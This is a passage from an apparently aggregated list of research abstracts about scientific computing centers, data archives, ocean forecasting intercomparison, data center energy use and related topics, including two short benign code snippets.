Comparisons to high-resolution SST products show some discrepancies in the representation of the ocean surface, due either to model and forcing-field errors or to the efficiency of the assimilation schemes. Comparisons to sea-ice satellite products also reveal discrepancies linked to the model, forcing, and assimilation strategies of each forecasting system. Key words: intercomparison, ocean analysis, operational oceanography, system assessment, metrics, validation. GODAE Intercomparison Team: L. Bertino (NERSC/Norway), G. Brassington (BMRC/Australia), E. Chassignet (FSU/USA), J. Cummings (NRL/USA), F. Davidson (DFO/Canada), M. Drévillon (CERFACS/France), P. Hacker (IPRC/USA), M. Kamachi (MRI/Japan), J.-M. Lellouche (CERFACS/France), K. A. Lisæter (NERSC/Norway), R. Mahdon (UKMO/UK), M. Martin (UKMO/UK), A. Ratsimandresy (DFO/Canada), and C. Regnier (Mercator Ocean/France)

  8. Environmental System Science Data Infrastructure for a Virtual Ecosystem (ESS-DIVE) - A New U.S. DOE Data Archive

    NASA Astrophysics Data System (ADS)

    Agarwal, D.; Varadharajan, C.; Cholia, S.; Snavely, C.; Hendrix, V.; Gunter, D.; Riley, W. J.; Jones, M.; Budden, A. E.; Vieglais, D.

    2017-12-01

The ESS-DIVE archive is a new U.S. Department of Energy (DOE) data archive designed to provide long-term stewardship and use of data from observational, experimental, and modeling activities in the earth and environmental sciences. The ESS-DIVE infrastructure is constructed with the long-term vision of enabling broad access to and usage of the DOE-sponsored data stored in the archive. It is designed as a scalable framework that incentivizes data providers to contribute well-structured, high-quality data to the archive and that enables the user community to easily build data processing, synthesis, and analysis capabilities using those data. The key innovations in our design include: (1) application of user-experience research methods to understand the needs of users and data contributors; (2) support for early data archiving during project data QA/QC and before public release; (3) focus on implementation of data standards in collaboration with the community; (4) support for community-built tools for data search, interpretation, analysis, and visualization; (5) a data fusion database to support search of the data extracted from submitted packages and of data available in partner data systems such as the Earth System Grid Federation (ESGF) and DataONE; and (6) support for archiving of data packages that are not to be released to the public. ESS-DIVE data contributors will be able to archive and version their data and metadata, obtain data DOIs, search for and access ESS data and metadata via web and programmatic portals, and provide data and metadata in standardized forms. The ESS-DIVE archive and catalog will be federated with other existing catalogs, allowing cross-catalog metadata search and data exchange with existing systems, including DataONE's Metacat search. ESS-DIVE is operated by a multidisciplinary team from Berkeley Lab, the National Center for Ecological Analysis and Synthesis (NCEAS), and DataONE.
The primary data copies are hosted at DOE's NERSC supercomputing facility, with replicas at DataONE nodes.

  9. Removing the center from computing: biology's new mode of digital knowledge production.

    PubMed

    November, Joseph

    2011-06-01

This article shows how the USA's National Institutes of Health (NIH) helped to bring about a major shift in the way computers are used to produce knowledge, and in the design of computers themselves, as a consequence of its early 1960s efforts to introduce information technology to biologists. Starting in 1960 the NIH sought to reform the life sciences by encouraging researchers to make use of digital electronic computers, but despite generous federal support biologists generally did not embrace the new technology. Initially the blame fell on biologists' lack of appropriate (i.e. digital) data for computers to process. However, when the NIH consulted MIT computer architect Wesley Clark about this problem, he argued that the computer's centralized character posed an even greater challenge to potential biologist users than did its need for digital data. Clark convinced the NIH that if the agency hoped to effectively computerize biology, it would need to satisfy biologists' experimental and institutional needs by providing them the means to use a computer without going to a computing center. With NIH support, Clark developed the 1963 Laboratory Instrument Computer (LINC), a small, real-time interactive computer intended to be used inside the laboratory and controlled entirely by its biologist users. Once built, the LINC provided a viable alternative to the 1960s norm of large computers housed in computing centers. As such, the LINC not only became popular among biologists, but also served in later decades as an important precursor of today's computing norm in the sciences and far beyond: the personal computer.

  10. Autonomic Computing for Spacecraft Ground Systems

    NASA Technical Reports Server (NTRS)

    Li, Zhenping; Savkli, Cetin; Jones, Lori

    2007-01-01

Autonomic computing for spacecraft ground systems increases system reliability and reduces the cost of spacecraft operations and software maintenance. In this paper, we present an autonomic computing solution for spacecraft ground systems at NASA Goddard Space Flight Center (GSFC), which consists of an open standard for a message-oriented architecture referred to as the GMSEC architecture (Goddard Mission Services Evolution Center), and an autonomic computing tool, the Criteria Action Table (CAT). This solution has been used in many upgraded ground systems for NASA's missions, and provides a framework for developing solutions with higher autonomic maturity.

  11. Computers as learning resources in the health sciences: impact and issues.

    PubMed Central

    Ellis, L B; Hannigan, G G

    1986-01-01

    Starting with two computer terminals in 1972, the Health Sciences Learning Resources Center of the University of Minnesota Bio-Medical Library expanded its instructional facilities to ten terminals and thirty-five microcomputers by 1985. Computer use accounted for 28% of total center circulation. The impact of these resources on health sciences curricula is described and issues related to use, support, and planning are raised and discussed. Judged by their acceptance and educational value, computers are successful health sciences learning resources at the University of Minnesota. PMID:3518843

  12. AHPCRC (Army High Performance Computing Research Center) Bulletin. Volume 1, Issue 2

    DTIC Science & Technology

    2011-01-01

    area and the researchers working on these projects. Also inside: news from the AHPCRC consortium partners at Morgan State University and the NASA ...Computing Research Center is provided by the supercomputing and research facilities at Stanford University and at the NASA Ames Research Center at...atomic and molecular level, he said. He noted that “every general would like to have” a Star Trek -like holodeck, where holographic avatars could

  13. SANs and Large Scale Data Migration at the NASA Center for Computational Sciences

    NASA Technical Reports Server (NTRS)

    Salmon, Ellen M.

    2004-01-01

Evolution and migration are a way of life for provisioners of high-performance mass storage systems that serve high-end computers used by climate and Earth and space science researchers: the compute engines come and go, but the data remains. At the NASA Center for Computational Sciences (NCCS), disk and tape SANs are deployed to provide high-speed I/O for the compute engines and the hierarchical storage management systems. Along with gigabit Ethernet, they also enable the NCCS's latest significant migration: the transparent transfer of 300 TB of legacy HSM data into the new Sun SAM-QFS cluster.

  14. [Computer-aided prescribing: from utopia to reality].

    PubMed

    Suárez-Varela Ubeda, J; Beltrán Calvo, C; Molina López, T; Navarro Marín, P

    2005-05-31

    To determine whether the introduction of computer-aided prescribing helped reduce the administrative burden at primary care centers. Descriptive, cross-sectional design. Torreblanca Health Center in the province of Seville, southern Spain. From 29 October 2003 to the present a pilot project involving nine pharmacies in the basic health zone served by this health center has been running to evaluate computer-aided prescribing (the Receta XXI project) with real patients. All patients on the center's list of patients who came to the center for an administrative consultation to renew prescriptions for medications or supplies for long-term treatment. Total number of administrative visits per patient for patients who came to the center to renew prescriptions for long-term treatment, as recorded by the Diraya system (Historia Clinica Digital del Ciudadano, or Citizen's Digital Medical Record) during the period from February to July 2004. Total number of the same type of administrative visits recorded by the previous system (TASS) during the period from February to July 2003. The mean number of administrative visits per month during the period from February to July 2003 was 160, compared to a mean number of 64 visits during the period from February to July 2004. The reduction in the number of visits for prescription renewal was 60%. Introducing a system for computer-aided prescribing significantly reduced the number of administrative visits for prescription renewal for long-term treatment. This could help reduce the administrative burden considerably in primary care if the system were used in all centers.
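As a quick sanity check on the reported figures, the 60% figure follows directly from the two monthly means quoted in the abstract:

```python
# Figures taken from the abstract: mean monthly administrative visits for
# prescription renewal before (Feb-Jul 2003) and after (Feb-Jul 2004)
# computer-aided prescribing was introduced.
before, after = 160, 64
reduction = (before - after) / before
print(f"{reduction:.0%} reduction")  # 60% reduction
```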

  15. Computer systems and software engineering

    NASA Technical Reports Server (NTRS)

    Mckay, Charles W.

    1988-01-01

    The High Technologies Laboratory (HTL) was established in the fall of 1982 at the University of Houston Clear Lake. Research conducted at the High Tech Lab is focused upon computer systems and software engineering. There is a strong emphasis on the interrelationship of these areas of technology and the United States' space program. In Jan. of 1987, NASA Headquarters announced the formation of its first research center dedicated to software engineering. Operated by the High Tech Lab, the Software Engineering Research Center (SERC) was formed at the University of Houston Clear Lake. The High Tech Lab/Software Engineering Research Center promotes cooperative research among government, industry, and academia to advance the edge-of-knowledge and the state-of-the-practice in key topics of computer systems and software engineering which are critical to NASA. The center also recommends appropriate actions, guidelines, standards, and policies to NASA in matters pertinent to the center's research. Results of the research conducted at the High Tech Lab/Software Engineering Research Center have given direction to many decisions made by NASA concerning the Space Station Program.

  16. Use of PL/1 in a Bibliographic Information Retrieval System.

    ERIC Educational Resources Information Center

    Schipma, Peter B.; And Others

    The Information Sciences section of ITT Research Institute (IITRI) has developed a Computer Search Center and is currently conducting a research project to explore computer searching of a variety of machine-readable data bases. The Center provides Selective Dissemination of Information services to academic, industrial and research organizations…

  17. Command History for 1990

    DTIC Science & Technology

    1991-05-01

Marine Corps Training Systems (CBESS) memorization training Intelligence Center, Dam Neck Threat memorization training Commander Tactical Wings, Atlantic...News Shipbuilding Technical training AEGIS Training Center, Dare Artificial Intelligence (AI) Tools Computerized firm-end analysis tools NETSCPAC...Technology Department and provides computational and electronic mail support for research in areas of artificial intelligence, computer-assisted instruction

  18. Postdoctoral Fellow | Center for Cancer Research

    Cancer.gov

    The Neuro-Oncology Branch (NOB), Center for Cancer Research (CCR), National Cancer Institute (NCI) of the National Institutes of Health (NIH) is seeking outstanding postdoctoral candidates interested in studying metabolic and cell signaling pathways in the context of brain cancers through construction of computational models amenable to formal computational analysis and

  19. Venus - Computer Simulated Global View Centered at 0 Degrees East Longitude

    NASA Image and Video Library

    1996-03-14

    This global view of the surface of Venus is centered at 0 degrees east longitude. NASA Magellan synthetic aperture radar mosaics from the first cycle of Magellan mapping were mapped onto a computer-simulated globe to create this image. http://photojournal.jpl.nasa.gov/catalog/PIA00257

  20. Computer-Aided Corrosion Program Management

    NASA Technical Reports Server (NTRS)

    MacDowell, Louis

    2010-01-01

    This viewgraph presentation reviews Computer-Aided Corrosion Program Management at John F. Kennedy Space Center. The contents include: 1) Corrosion at the Kennedy Space Center (KSC); 2) Requirements and Objectives; 3) Program Description, Background and History; 4) Approach and Implementation; 5) Challenges; 6) Lessons Learned; 7) Successes and Benefits; and 8) Summary and Conclusions.

  1. DOE Office of Scientific and Technical Information (OSTI.GOV)

    Shankar, Arjun

    Computer scientist Arjun Shankar is director of the Compute and Data Environment for Science (CADES), ORNL’s multidisciplinary big data computing center. CADES offers computing, networking and data analytics to facilitate workflows for both ORNL and external research projects.

  2. Research on Using the Naturally Cold Air and the Snow for Data Center Air-conditioning, and Humidity Control

    NASA Astrophysics Data System (ADS)

    Tsuda, Kunikazu; Tano, Shunichi; Ichino, Junko

Lowering power consumption has become a worldwide concern. It is also a growing issue in computer systems, as reflected by the spread of software-as-a-service and cloud computing, whose market has grown since 2000; at the same time, the number of data centers that host and manage the computers has increased rapidly. Power consumption at data centers accounts for a large share of total IT power usage, and is still rising rapidly. This research focuses on air-conditioning, which accounts for the largest portion of a data center's electric power consumption, and proposes a technique to lower power consumption by using naturally cold air and snow to control temperature and humidity. We verify the effectiveness of this approach by experiment. Furthermore, we also examine the extent to which energy reduction is possible when a data center is located in Hokkaido.

  3. Investigating the Mechanism of Action and the Identification of Breast Carcinogens by Computational Analysis of Female Rodent Carcinogens

    DTIC Science & Technology

    2006-08-01

    preparing a COBRE Molecular Targets Project with a goal to extend the computational work of Specific Aims of this project to the discovery of novel...million Center of Biomedical Research Excellence ( COBRE ) grant from the National Center for Research Resources at the National Institutes of Health...three year COBRE -funded project in Molecular Targets. My recruitment to the University of Louisville’s Brown Cancer Center and my proposed COBRE

  4. DoDs Efforts to Consolidate Data Centers Need Improvement

    DTIC Science & Technology

    2016-03-29

    Consolidation Initiative, February 26, 2010. 3 Green IT minimizes negative environmental impact of IT operations by ensuring that computers and computer-related...objectives for consolidating data centers. DoD’s objectives were to: • reduce cost; • reduce environmental impact ; • improve efficiency and service levels...number of DoD data centers. Finding A DODIG-2016-068 │ 7 information in DCIM, the DoD CIO did not confirm whether those changes would impact DoD’s

  5. Bridging the digital divide by increasing computer and cancer literacy: community technology centers for head-start parents and families.

    PubMed

    Salovey, Peter; Williams-Piehota, Pamela; Mowad, Linda; Moret, Marta Elisa; Edlund, Denielle; Andersen, Judith

    2009-01-01

    This article describes the establishment of two community technology centers affiliated with Head Start early childhood education programs focused especially on Latino and African American parents of children enrolled in Head Start. A 6-hour course concerned with computer and cancer literacy was presented to 120 parents and other community residents who earned a free, refurbished, Internet-ready computer after completing the program. Focus groups provided the basis for designing the structure and content of the course and modifying it during the project period. An outcomes-based assessment comparing program participants with 70 nonparticipants at baseline, immediately after the course ended, and 3 months later suggested that the program increased knowledge about computers and their use, knowledge about cancer and its prevention, and computer use including health information-seeking via the Internet. The creation of community computer technology centers requires the availability of secure space, capacity of a community partner to oversee project implementation, and resources of this partner to ensure sustainability beyond core funding.

  6. The Center for Computational Biology: resources, achievements, and challenges

    PubMed Central

    Dinov, Ivo D; Thompson, Paul M; Woods, Roger P; Van Horn, John D; Shattuck, David W; Parker, D Stott

    2011-01-01

The Center for Computational Biology (CCB) is a multidisciplinary program where biomedical scientists, engineers, and clinicians work jointly to combine modern mathematical and computational techniques to perform phenotypic and genotypic studies of biological structure, function, and physiology in health and disease. CCB has developed a computational framework built around the Manifold Atlas, an integrated biomedical computing environment that enables statistical inference on biological manifolds. These manifolds model biological structures, features, shapes, and flows, and support sophisticated morphometric and statistical analyses. The Manifold Atlas includes tools, workflows, and services for multimodal population-based modeling and analysis of biological manifolds. The broad spectrum of biomedical topics explored by CCB investigators includes the study of normal and pathological brain development, maturation and aging, discovery of associations between neuroimaging and genetic biomarkers, and the modeling, analysis, and visualization of biological shape, form, and size. CCB supports a wide range of short-term and long-term collaborations with outside investigators, which drive the center's computational developments and focus the validation and dissemination of CCB resources to new areas and scientific domains. PMID:22081221

  7. The Center for Computational Biology: resources, achievements, and challenges.

    PubMed

    Toga, Arthur W; Dinov, Ivo D; Thompson, Paul M; Woods, Roger P; Van Horn, John D; Shattuck, David W; Parker, D Stott

    2012-01-01

The Center for Computational Biology (CCB) is a multidisciplinary program where biomedical scientists, engineers, and clinicians work jointly to combine modern mathematical and computational techniques to perform phenotypic and genotypic studies of biological structure, function, and physiology in health and disease. CCB has developed a computational framework built around the Manifold Atlas, an integrated biomedical computing environment that enables statistical inference on biological manifolds. These manifolds model biological structures, features, shapes, and flows, and support sophisticated morphometric and statistical analyses. The Manifold Atlas includes tools, workflows, and services for multimodal population-based modeling and analysis of biological manifolds. The broad spectrum of biomedical topics explored by CCB investigators includes the study of normal and pathological brain development, maturation and aging, discovery of associations between neuroimaging and genetic biomarkers, and the modeling, analysis, and visualization of biological shape, form, and size. CCB supports a wide range of short-term and long-term collaborations with outside investigators, which drive the center's computational developments and focus the validation and dissemination of CCB resources to new areas and scientific domains.

  8. Decomposition of algebraic sets and applications to weak centers of cubic systems

    NASA Astrophysics Data System (ADS)

    Chen, Xingwu; Zhang, Weinian

    2009-10-01

There are many methods, such as Gröbner bases, characteristic sets and resultants, for computing the algebraic set of a system of multivariate polynomials. The common difficulties come from the complexity of the computation, singularity of the corresponding matrices, and unnecessary factors arising in successive computations. In this paper, we decompose algebraic sets, stratum by stratum, into a union of constructible sets with Sylvester resultants, so as to simplify the procedure of elimination. Applying this decomposition to systems of multivariate polynomials resulting from the period constants of reversible cubic differential systems which possess a quadratic isochronous center, we determine the order of weak centers and discuss the bifurcation of critical periods.
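To make the resultant step concrete, here is a minimal, self-contained sketch (illustrative only, not the authors' code): it builds a Sylvester matrix for two univariate polynomials with integer coefficients and uses its determinant, the resultant, to test for a common root. The polynomial choices are invented for the example.

```python
# Minimal Sylvester-resultant sketch (hypothetical example polynomials).
# Polynomials are coefficient lists, highest degree first.
from itertools import permutations

def sylvester(f, g):
    """Sylvester matrix of f and g: deg(g) shifted copies of f stacked
    over deg(f) shifted copies of g; size deg(f) + deg(g)."""
    m, n = len(f) - 1, len(g) - 1
    rows = [[0] * i + f + [0] * (n - 1 - i) for i in range(n)]
    rows += [[0] * i + g + [0] * (m - 1 - i) for i in range(m)]
    return rows

def det(a):
    """Leibniz-formula determinant; adequate for these small matrices."""
    n = len(a)
    total = 0
    for perm in permutations(range(n)):
        # parity of the permutation from its inversion count
        inv = sum(1 for i in range(n) for j in range(i + 1, n) if perm[i] > perm[j])
        prod = 1
        for i in range(n):
            prod *= a[i][perm[i]]
        total += (-1) ** inv * prod
    return total

def resultant(f, g):
    """Res(f, g) vanishes exactly when f and g share a root."""
    return det(sylvester(f, g))

f = [1, -3, 2]                  # x^2 - 3x + 2, roots {1, 2}
print(resultant(f, [1, -2]))    # shares the root 2 -> 0
print(resultant(f, [1, -5]))    # no common root -> 12
```

Eliminating one variable at a time this way is the operation the stratum-by-stratum decomposition organizes; computer algebra systems expose it directly (e.g. SymPy's `resultant`).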

  9. Development of Advanced Computational Aeroelasticity Tools at NASA Langley Research Center

    NASA Technical Reports Server (NTRS)

    Bartels, R. E.

    2008-01-01

    NASA Langley Research Center has continued to develop its long standing computational tools to address new challenges in aircraft and launch vehicle design. This paper discusses the application and development of those computational aeroelastic tools. Four topic areas will be discussed: 1) Modeling structural and flow field nonlinearities; 2) Integrated and modular approaches to nonlinear multidisciplinary analysis; 3) Simulating flight dynamics of flexible vehicles; and 4) Applications that support both aeronautics and space exploration.

  10. Computational Fluid Dynamics. [numerical methods and algorithm development

    NASA Technical Reports Server (NTRS)

    1992-01-01

    This collection of papers was presented at the Computational Fluid Dynamics (CFD) Conference held at Ames Research Center in California on March 12 through 14, 1991. It is an overview of CFD activities at NASA Lewis Research Center. The main thrust of computational work at Lewis is aimed at propulsion systems. Specific issues related to propulsion CFD and associated modeling will also be presented. Examples of results obtained with the most recent algorithm development will also be presented.

  11. Expanding HPC and Research Computing--The Sustainable Way

    ERIC Educational Resources Information Center

    Grush, Mary

    2009-01-01

    Increased demands for research and high-performance computing (HPC)--along with growing expectations for cost and environmental savings--are putting new strains on the campus data center. More and more, CIOs like the University of Notre Dame's (Indiana) Gordon Wishon are seeking creative ways to build more sustainable models for data center and…

  12. School Data Processing Services in Texas. A Cooperative Approach. [Revised.

    ERIC Educational Resources Information Center

    Texas Education Agency, Austin. Management Information Center.

    The Texas plan for computer services provides services to public school districts through a statewide network of 20 regional Education Service Centers (ESC). Each of the three Multi-Regional Processing Centers (MRPCs) operates a large computer facility providing school district services within from three to eight ESC regions; each of the five…

  13. School Data Processing Services in Texas: A Cooperative Approach.

    ERIC Educational Resources Information Center

    Texas Education Agency, Austin.

    The Texas plan for computer services provides services to public school districts through a statewide network of 20 regional Education Service Centers (ESC). Each of the three Multi-Regional Processing Centers (MRPCs) operates a large computer facility providing school district services within from three to eight ESC regions; each of the five…

  14. School Data Processing Services in Texas: A Cooperative Approach.

    ERIC Educational Resources Information Center

    Texas Education Agency, Austin.

The Texas plan for computer services provides services to public school districts through a statewide network of 20 regional Education Service Centers (ESC). Each of the three Multi-Regional Processing Centers (MRPCs) operates a large computer facility providing school district services within from three to eight ESC regions; each of the five…

  15. Remote Science Operation Center research

    NASA Technical Reports Server (NTRS)

    Banks, P. M.

    1986-01-01

    Progress in the following areas is discussed: the design, planning and operation of a remote science payload operations control center; design and planning of a data link via satellite; and the design and prototyping of an advanced workstation environment for multi-media (3-D computer aided design/computer aided engineering, voice, video, text) communications and operations.

  16. SAM: The "Search and Match" Computer Program of the Escherichia coli Genetic Stock Center

    ERIC Educational Resources Information Center

    Bachmann, B. J.; And Others

    1973-01-01

    Describes a computer program used at a genetic stock center to locate particular strains of bacteria. The program can match up to 30 strain descriptions requested by a researcher with the records on file. Uses of this particular program can be made in many fields. (PS)
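The matching idea can be sketched in a few lines; this toy lookup (strain names and marker sets are placeholders, not real stock-center data) returns every record whose description contains all markers in a request:

```python
# Toy "search and match" lookup in the spirit of SAM (illustrative only;
# strain names and genetic markers below are invented placeholders).
records = {
    "strain-A": {"thr-1", "leuB6", "proA2"},
    "strain-B": {"ilvG", "rph-1"},
    "strain-C": {"rpoS396", "rph-1"},
}

def search_and_match(requests, records):
    """For each requested description (a set of markers), return the
    record names whose marker sets contain every requested marker."""
    return {
        name: sorted(s for s, markers in records.items() if wanted <= markers)
        for name, wanted in requests.items()
    }

print(search_and_match({"query-1": {"rph-1"}}, records))
# {'query-1': ['strain-B', 'strain-C']}
```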

  17. Hibbing Community College's Community Computer Center.

    ERIC Educational Resources Information Center

    Regional Technology Strategies, Inc., Carrboro, NC.

    This paper reports on the development of the Community Computer Center (CCC) at Hibbing Community College (HCC) in Minnesota. HCC is located in the largest U.S. iron mining area in the United States. Closures of steel-producing plants are affecting the Hibbing area. Outmigration, particularly of younger workers and their families, has been…

  18. 48 CFR 9905.506-60 - Illustrations.

    Code of Federal Regulations, 2013 CFR

    2013-10-01

    ..., installs a computer service center to begin operations on May 1. The operating expense related to the new... operating expenses of the computer service center for the 8-month part of the cost accounting period may be... 48 Federal Acquisition Regulations System 7 2013-10-01 2012-10-01 true Illustrations. 9905.506-60...

  19. The Mathematics and Computer Science Learning Center (MLC).

    ERIC Educational Resources Information Center

    Abraham, Solomon T.

    The Mathematics and Computer Science Learning Center (MLC) was established in the Department of Mathematics at North Carolina Central University during the fall semester of the 1982-83 academic year. The initial operations of the MLC were supported by grants to the University from the Burroughs-Wellcome Company and the Kenan Charitable Trust Fund.…

  20. Film Library Information Management System.

    ERIC Educational Resources Information Center

    Minnella, C. Vincent; And Others

    The computer program described not only allows the user to determine rental sources for a particular film title quickly, but also to select the least expensive of the sources. This program developed at SUNY Cortland's Sperry Learning Resources Center and Computer Center is designed to maintain accurate data on rental and purchase films in both…

  1. Microgravity

    NASA Image and Video Library

    1999-05-26

Looking for a faster computer? How about an optical computer that processes data streams simultaneously and works with the speed of light? In space, NASA researchers have formed optical thin films. By turning these thin films into very fast optical computer components, scientists could improve computer tasks, such as pattern recognition. Dr. Hossin Abdeldayem, physicist at NASA/Marshall Space Flight Center (MSFC) in Huntsville, AL, is working with lasers as part of an optical system for pattern recognition. These systems can be used for automated fingerprinting, photographic scanning, and the development of sophisticated artificial intelligence systems that can learn and evolve. Photo credit: NASA/Marshall Space Flight Center (MSFC)

  2. Knowledge management: Role of the the Radiation Safety Information Computational Center (RSICC)

    NASA Astrophysics Data System (ADS)

    Valentine, Timothy

    2017-09-01

    The Radiation Safety Information Computational Center (RSICC) at Oak Ridge National Laboratory (ORNL) is an information analysis center that collects, archives, evaluates, synthesizes and distributes information, data and codes that are used in various nuclear technology applications. RSICC retains more than 2,000 software packages that have been provided by code developers from various federal and international agencies. RSICC's customers (scientists, engineers, and students from around the world) obtain access to such computing codes (source and/or executable versions) and processed nuclear data files to promote on-going research, to ensure nuclear and radiological safety, and to advance nuclear technology. The role of such information analysis centers is critical for supporting and sustaining nuclear education and training programs both domestically and internationally, as the majority of RSICC's customers are students attending U.S. universities. Additionally, RSICC operates a secure CLOUD computing system to provide access to sensitive export-controlled modeling and simulation (M&S) tools that support both domestic and international activities. This presentation will provide a general review of RSICC's activities, services, and systems that support knowledge management and education and training in the nuclear field.

  3. Computer Learning for Young Children.

    ERIC Educational Resources Information Center

    Choy, Anita Y.

    1995-01-01

    Computer activities that combine education and entertainment make learning easy and fun for preschoolers. Computers encourage social skills, language and literacy skills, cognitive development, problem solving, and eye-hand coordination. The paper describes one teacher's experiences setting up a computer center and using computers with…

  4. Computer Literacy Project. A General Orientation in Basic Computer Concepts and Applications.

    ERIC Educational Resources Information Center

    Murray, David R.

    This paper proposes a two-part, basic computer literacy program for university faculty, staff, and students with no prior exposure to computers. The program described would introduce basic computer concepts and computing center service programs and resources; provide fundamental preparation for other computer courses; and orient faculty towards…

  5. Physics of the 1 Teraflop RIKEN-BNL-Columbia QCD project. Proceedings of RIKEN BNL Research Center workshop: Volume 13

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    NONE

    1998-10-16

A workshop was held at the RIKEN-BNL Research Center on October 16, 1998, as part of the first anniversary celebration for the center. This meeting brought together the physicists from RIKEN-BNL, BNL and Columbia who are using the QCDSP (Quantum Chromodynamics on Digital Signal Processors) computer at the RIKEN-BNL Research Center for studies of QCD. Many of the talks in the workshop were devoted to domain wall fermions, a discretization of the continuum description of fermions which preserves the global symmetries of the continuum, even at finite lattice spacing. This formulation has been the subject of analytic investigation for some time and has reached the stage where large-scale simulations in QCD seem very promising. With the computational power available from the QCDSP computers, scientists are looking forward to an exciting time for numerical simulations of QCD.

  6. Computational Science News | Computational Science | NREL

    Science.gov Websites

    February 28, 2018: NREL Launches New Website for High-Performance Computing System Users. The National Renewable Energy Laboratory (NREL) Computational Science Center has launched a revamped website for users of the lab's high-performance computing (HPC) systems.

  7. Computer Training for Seniors: An Academic-Community Partnership

    ERIC Educational Resources Information Center

    Sanders, Martha J.; O'Sullivan, Beth; DeBurra, Katherine; Fedner, Alesha

    2013-01-01

    Computer technology is integral to information retrieval, social communication, and social interaction. However, only 47% of seniors aged 65 and older use computers. The purpose of this study was to determine the impact of a client-centered computer program on computer skills, attitudes toward computer use, and generativity in novice senior…

  8. Benefits Analysis of Multi-Center Dynamic Weather Routes

    NASA Technical Reports Server (NTRS)

    Sheth, Kapil; McNally, David; Morando, Alexander; Clymer, Alexis; Lock, Jennifer; Petersen, Julien

    2014-01-01

    Dynamic weather routes are flight plan corrections that can provide airborne flights more than a user-specified number of minutes of flying-time savings compared to their current flight plan. These routes are computed from the aircraft's current location to a flight plan fix downstream (within a predefined limit region), while avoiding forecasted convective weather regions. The Dynamic Weather Routes automation has been running continuously with live air traffic data for a field evaluation at the American Airlines Integrated Operations Center in Fort Worth, TX since July 31, 2012, where flights within the Fort Worth Air Route Traffic Control Center are evaluated for time savings. This paper extends the methodology to all Centers in the United States and presents a benefits analysis of the Dynamic Weather Routes automation as if it were implemented in multiple airspace Centers individually and concurrently. The current computation of dynamic weather routes requires a limit rectangle so that a downstream capture fix can be selected, preventing very large route changes spanning several Centers. In this paper, first, a method of computing a limit polygon (as opposed to the rectangle used for Fort Worth Center) is described for each of the 20 Centers in the National Airspace System. The Future ATM Concepts Evaluation Tool, a nationwide simulation and analysis tool, is used for this purpose. After a comparison of results with the Center-based Dynamic Weather Routes automation in Fort Worth Center, results are presented for 11 Centers in the contiguous United States, the Centers generally most impacted by convective weather. A breakdown of individual Center and airline savings is presented, and the results indicate an overall average savings of about 10 minutes of flying time per flight.

  9. Library Media Learning and Play Center.

    ERIC Educational Resources Information Center

    Faber, Therese; And Others

    Preschool educators developed a library media learning and play center to enable children to "experience" a library; establish positive attitudes about the library; and encourage respect for self, others, and property. The center had the following areas: check-in and check-out desk, quiet reading section, computer center, listening center, video…

  10. RIACS

    NASA Technical Reports Server (NTRS)

    Moore, Robert C.

    1998-01-01

    The Research Institute for Advanced Computer Science (RIACS) was established by the Universities Space Research Association (USRA) at the NASA Ames Research Center (ARC) on June 6, 1983. RIACS is privately operated by USRA, a consortium of universities that serves as a bridge between NASA and the academic community. Under a five-year cooperative agreement with NASA, research at RIACS is focused on areas that are strategically enabling to the Ames Research Center's role as NASA's Center of Excellence for Information Technology. The primary mission of RIACS is to carry out research and development in computer science, devoted mainly to tasks that are strategically enabling with respect to NASA's mission in space exploration and aeronautics. There are three foci for this work: (1) automated reasoning, (2) human-centered computing, and (3) high-performance computing and networking. RIACS has the additional goal of broadening the base of researchers in these areas of importance to the nation's space and aeronautics enterprises. Through its visiting scientist program, RIACS facilitates the participation of university-based researchers, including both faculty and students, in the research activities of NASA and RIACS. RIACS researchers work in close collaboration with NASA computer scientists on projects such as the Remote Agent Experiment on the Deep Space One mission and Super-Resolution Surface Modeling.

  11. The effective use of virtualization for selection of data centers in a cloud computing environment

    NASA Astrophysics Data System (ADS)

    Kumar, B. Santhosh; Parthiban, Latha

    2018-04-01

    Data centers consist of networks of remote servers that store, access, and process data. Cloud computing is a technology in which users worldwide submit tasks and service providers direct the requests to the data centers responsible for executing them. The servers in the data centers employ virtualization so that multiple tasks can be executed simultaneously. In this paper, we propose an algorithm for data center selection based on the energy of the virtual machines created on each server. The virtualization energy of each server is calculated, and the total energy of the data center is obtained by summing the individual server energies. Submitted tasks are routed to the data center with the least energy consumption, which minimizes the operational expenses of the service provider.
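    The selection rule the abstract describes (sum the virtual-machine energies per server, sum the servers per data center, route each task to the least-energy data center) can be sketched as follows. The data layout and function names are illustrative assumptions, not the authors' implementation:

```python
# Sketch of energy-based data center selection (illustrative, not the paper's code).
# A data center is a list of servers; each server is a list of the energy values
# of the virtual machines it currently hosts.

def server_energy(vm_energies):
    """Total virtualization energy of one server."""
    return sum(vm_energies)

def datacenter_energy(servers):
    """Total energy of a data center: the sum of its servers' energies."""
    return sum(server_energy(vms) for vms in servers)

def select_datacenter(datacenters):
    """Index of the data center with the least total energy consumption."""
    return min(range(len(datacenters)),
               key=lambda i: datacenter_energy(datacenters[i]))

# Example: two data centers holding VM energy values.
dc_a = [[10.0, 5.0], [7.5]]      # total 22.5
dc_b = [[4.0, 4.0], [6.0, 2.0]]  # total 16.0
assert select_datacenter([dc_a, dc_b]) == 1  # dc_b consumes less energy
```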

  12. A hypothesis on the formation of the primary ossification centers in the membranous neurocranium: a mathematical and computational model.

    PubMed

    Garzón-Alvarado, Diego A

    2013-01-21

    This article develops a model of the appearance and location of the primary centers of ossification in the calvaria. The model uses a system of reaction-diffusion equations of two molecules (BMP and Noggin) whose behavior is of type activator-substrate and its solution produces Turing patterns, which represents the primary ossification centers. Additionally, the model includes the level of cell maturation as a function of the location of mesenchymal cells. Thus the mature cells can become osteoblasts due to the action of BMP2. Therefore, with this model, we can have two frontal primary centers, two parietal, and one, two or more occipital centers. The location of these centers in the simplified computational model is highly consistent with those centers found at an embryonic level. Copyright © 2012 Elsevier Ltd. All rights reserved.
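    The activator-substrate dynamics the abstract describes can be illustrated with a generic Gierer-Meinhardt-type reaction-diffusion system. This is a textbook form, not the paper's specific equations for BMP and Noggin:

```latex
\begin{aligned}
\frac{\partial a}{\partial t} &= D_a \nabla^{2} a + \rho\,\frac{a^{2} s}{1 + \kappa a^{2}} - \mu_a a \\
\frac{\partial s}{\partial t} &= D_s \nabla^{2} s - \rho\,\frac{a^{2} s}{1 + \kappa a^{2}} + \sigma - \mu_s s
\end{aligned}
```

    Here a plays the role of the activator (BMP) and s the substrate consumed by activator production; Turing patterns, the model's candidate ossification centers, arise when the substrate diffuses much faster than the activator (D_s >> D_a).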

  13. Establishment of a Beta Test Center for the NPARC Code at Central State University

    NASA Technical Reports Server (NTRS)

    Okhio, Cyril B.

